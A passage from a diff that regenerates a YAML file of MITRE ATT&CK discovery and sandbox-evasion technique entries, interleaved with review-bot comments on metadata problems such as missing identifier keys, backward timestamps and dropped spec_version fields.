+ url: https://support.google.com/a/answer/166870?hl=en
+ - source_name: Microsoft Exchange Address Lists
+ description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+ Retrieved March 26, 2020.
+ url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+ - source_name: Microsoft getglobaladdresslist
+ description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+ 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1497.003:
+ technique:
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
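Review bot: T1087.003 still has no `identifier:` key after the rewrite (compare `identifier: T1010` just above and `identifier: T1497.003` in the next entry); T1069 and T1069.003 have the same gap earlier in the patch. If the generator derives `identifier` from the technique's `external_id`, this regeneration is the place to emit `identifier: T1087.003` as well. The `+` description line correctly restores the missing space in `the Get-GlobalAddressList`, and the dropped `x_mitre_permissions_required: - User` follows the same pattern as T1056.004 and should be called out together with it.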
@@ -49395,6 +50043,12 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -49404,9 +50058,14 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -49416,102 +50075,137 @@ discovery:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1580:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Regina Elwell
- Praetorian
- Isif Ibrahima, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users and enumerations from unknown or malicious IP addresses.
+ To reduce false positives, valid change management procedures could introduce
+ a known identifier that is logged with the change (e.g., tag or header) if
+ supported by the cloud provider, to help distinguish valid, expected actions
+ from malicious ones.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Instance: Instance Enumeration'
+ - 'Cloud Storage: Cloud Storage Enumeration'
+ - 'Volume: Volume Enumeration'
+ - 'Snapshot: Snapshot Enumeration'
type: attack-pattern
id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
created: '2020-08-20T17:51:25.671Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1580
url: https://attack.mitre.org/techniques/T1580
+ external_id: T1580
- source_name: Expel IO Evil in AWS
- url: https://expel.io/blog/finding-evil-in-aws/
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
+ url: https://expel.io/blog/finding-evil-in-aws/
- source_name: AWS Head Bucket
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
14, 2022.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
- source_name: AWS Get Public Access Block
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
- source_name: AWS Describe DB Instances
- url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
- source_name: Amazon Describe Instance
- url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
description: Amazon. (n.d.). describe-instance-information. Retrieved March
3, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
- source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
description: Google. (n.d.). gcloud compute instances list. Retrieved May
26, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Microsoft AZ CLI
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
- url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
- Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
- An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Infrastructure Discovery
- x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
- components. Monitor logs for actions that could be taken to gather information
- about cloud infrastructure, including the use of discovery API calls by new
- or unexpected users and enumerations from unknown or malicious IP addresses.
- To reduce false positives, valid change management procedures could introduce
- a known identifier that is logged with the change (e.g., tag or header) if
- supported by the cloud provider, to help distinguish valid, expected actions
- from malicious ones.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Instance: Instance Enumeration'
- - 'Cloud Storage: Cloud Storage Enumeration'
- - 'Volume: Volume Enumeration'
- - 'Snapshot: Snapshot Enumeration'
- x_mitre_attack_spec_version: 2.1.0
+ url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1580
atomic_tests: []
T1217:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-16T14:24:40.625Z'
name: Browser Bookmark Discovery
description: |-
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
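Review bot: the `modified` timestamp for T1217 moves backwards in this hunk (`2023-05-09T14:00:00.188Z` to `2023-04-16T14:24:40.625Z`), and the same regression shows up for T1482, T1049, T1619 and T1069.001 further down; that pattern suggests the regenerated file is reading a different `modified` field or a different bundle than the previous run, so confirm the new source of truth before merging rather than treating these as deliberate edits. Two smaller things in the T1580 block: the `Microsoft AZ CLI` reference is carried over with a description of `az ad user` and a URL under `/cli/azure/ad/user` while the description text cites it for `az vm list` (an upstream ATT&CK mismatch, but worth flagging so nobody relies on that link), and `spec_version: '2.1'` is dropped here for the first of many techniques, so if any consumer validates these as STIX 2.1 objects it will need that key back.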
@@ -49565,7 +50259,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1217
atomic_tests: []
T1016:
@@ -49595,7 +50288,7 @@ discovery:
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
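Review bot: the replacement marker `{{LinkById|T1059.008}` in the new `x_mitre_detection` text has unbalanced braces (two opening, one closing), so whatever expands these markers will most likely leave the literal text in the rendered output; the old form `(LinkById: T1059.008)` was already an unrendered marker rather than a link, so this should either be corrected to `{{LinkById|T1059.008}}` upstream or resolved to a markdown link to `https://attack.mitre.org/techniques/T1059/008`, matching the other links in the same paragraph.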
@@ -49633,12 +50326,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016
atomic_tests: []
T1087:
technique:
- modified: '2024-01-12T23:36:56.245Z'
+ modified: '2024-10-15T15:35:28.784Z'
name: Account Discovery
description: |-
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -49665,14 +50357,13 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
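Review bot: dropping `Azure AD`, `Office 365` and `Google Workspace` from `x_mitre_platforms` in favour of `Office Suite` and `Identity Provider` (with the bump to `x_mitre_version: '2.5'`) changes the platform keys that anything downstream filters on, so any per-platform index or tooling that still matches the old strings will silently stop finding T1087; those consumers need to be regenerated or updated alongside this file.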
@@ -49701,7 +50392,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1482:
technique:
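Review bot: unlike the neighbouring entries (T1217 and T1016 above keep an `identifier:` line between `x_mitre_modified_by_ref` and `atomic_tests: []`), this T1087 block goes straight from `x_mitre_modified_by_ref` to `atomic_tests: []` with no `identifier: T1087`; the same shape appears for T1497, T1087.004 and T1497.002 below. If the key simply lives elsewhere in the mapping that is fine, but if the generator dropped it, anything keyed on `identifier` will miss these techniques.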
@@ -49761,7 +50451,7 @@ discovery:
.NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T19:18:22.305Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Trust Discovery
x_mitre_detection: |
@@ -49780,7 +50470,6 @@ discovery:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1482
atomic_tests: []
T1083:
@@ -49849,12 +50538,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1083
atomic_tests: []
T1049:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-09-06T22:35:34.231Z'
name: System Network Connections Discovery
description: "Adversaries may attempt to get a listing of network connections
to or from the compromised system they are currently accessing or from remote
@@ -49931,40 +50619,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1049
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -49976,6 +50635,10 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -49986,8 +50649,14 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -49997,9 +50666,28 @@ discovery:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1619:
technique:
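Review bot: the `Deloitte Environment Awareness` reference comes back with `/edit` appended to the Google Drive URL and a new retrieval date (September 13, 2024); the bare `file/d/<id>` form it replaces is the usual public share link, so confirm the `/edit` form resolves for an anonymous reader before keeping it (the same URL change is repeated for T1497.002 below). The rest of this hunk is a reorder: `x_mitre_modified_by_ref`, removed in the previous hunk, is reinstated here, and `x_mitre_attack_spec_version` moves from `2.1.0` to `3.2.0`.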
@@ -50032,7 +50720,7 @@ discovery:
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-11T22:29:43.677Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Cloud Storage Object Discovery
x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50050,12 +50738,11 @@ discovery:
- 'Cloud Storage: Cloud Storage Enumeration'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1619
atomic_tests: []
T1654:
technique:
- modified: '2023-09-30T22:18:46.711Z'
+ modified: '2024-10-15T12:24:40.892Z'
name: Log Enumeration
description: |-
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50063,11 +50750,14 @@ discovery:
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+ In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_contributors:
- Bilal Bahadır Yenici
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -50078,7 +50768,7 @@ discovery:
- macOS
- Windows
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -50092,6 +50782,10 @@ discovery:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1654
external_id: T1654
+ - source_name: Permiso GUI-Vil 2023
+ description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+ Cloud Threat Actor. Retrieved August 30, 2024.'
+ url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
- source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50111,56 +50805,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1654
atomic_tests: []
T1087.004:
technique:
- x_mitre_platforms:
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
- type: attack-pattern
- created: '2020-02-21T21:08:36.570Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.004
- url: https://attack.mitre.org/techniques/T1087/004
- - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
- source_name: Microsoft msolrolemember
- - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
- 6, 2019.
- url: https://github.com/True-Demon/raindance
- source_name: GitHub Raindance
- - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Microsoft AZ CLI
